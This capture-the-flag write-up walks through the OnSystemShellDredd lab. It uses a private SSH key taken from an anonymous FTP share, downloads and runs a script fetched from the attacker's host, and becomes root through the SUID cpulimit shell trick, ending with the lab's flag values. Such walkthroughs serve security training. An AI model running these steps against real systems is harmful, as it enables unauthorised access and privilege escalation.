OnSystemShellDredd

This is my write ups for OnSystemShellDredd on Off-Sec Proving Ground.

This room is a CTF type of room

I will try to go deep into the technical thing we do in this room.

---

1. Enum

• Start the machine and get the IP

• Export the IP to the terminal so we can use it easier

export IP=192.168.73.130;clear

## Test to see if the IP is correct
echo $IP

• Start our usual port scans

nmap -sC -sV $IP
rustscan -a $IP

---

Nmap default scan result

PORT    STATE    SERVICE   VERSION
21/tcp  open     ftp       vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.49.73
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

Rustscan result

PORT      STATE SERVICE REASON
21/tcp    open  ftp     syn-ack
61000/tcp open  unknown syn-ack

• Lets check out the ftp server

ftp -p $IP
Connected to 192.168.73.130.
220 (vsFTPd 3.0.3)
Name (192.168.73.130:minhnq): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
---
ftp> ls -la
229 Entering Extended Passive Mode (|||26474|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        115          4096 Aug 06  2020 .
drwxr-xr-x    3 0        115          4096 Aug 06  2020 ..
drwxr-xr-x    2 0        0            4096 Aug 06  2020 .hannah
226 Directory send OK.
---
ftp> cd .hannah
250 Directory successfully changed.
---
ftp> ls -la
229 Entering Extended Passive Mode (|||55941|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Aug 06  2020 .
drwxr-xr-x    3 0        115          4096 Aug 06  2020 ..
-rwxr-xr-x    1 0        0            1823 Aug 06  2020 id_rsa
226 Directory send OK.
---
get id_rsa

2. Foothold

• We got ourself an id_rsa from hannah, give the file correct permissions of 600 then we can try and login ssh as her

chmod 600 id_rsa
ssh -i id_rsa hannah@$IP -p 61000

Why port 61000 you might ask ?

• From the rustscan result we got from the start there is only 2 ports open 21 and 61000 then we are safe to assume the port 61000 is running ssh right ?

• Or we can check the service on port 61000 with a quick banner grabbing

nc -v $IP 61000
192.168.73.130: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.73.130] 61000 (?) open
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

• Lets move on, we should upload the pee.sh script to the target machine and run it to find any interesting information that can help us become root

## On kali machine
python3 -m http.server 88

## On target machine
cd /dev/shm
wget 192.168.49.73:88/pee.sh
chmod +x pee.sh
./pee.sh

pee.sh result

[+] Looking for all SUID files: 
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/cpulimit
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mawk
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount

3. PrivEsc

• From our friend GTFOBINS we can see that cpulimit is very much exploitable with suid on them

Become root

cpulimit -l 100 -f -- /bin/sh -p
Process 1208 detected
# whoami
root

Get the flags

cat /home/hannah/local.txt /root/proof.txt
805f80ee0987338811d559374aff6a6f
a8675e7ab8e8deb96cd898ec90df64fc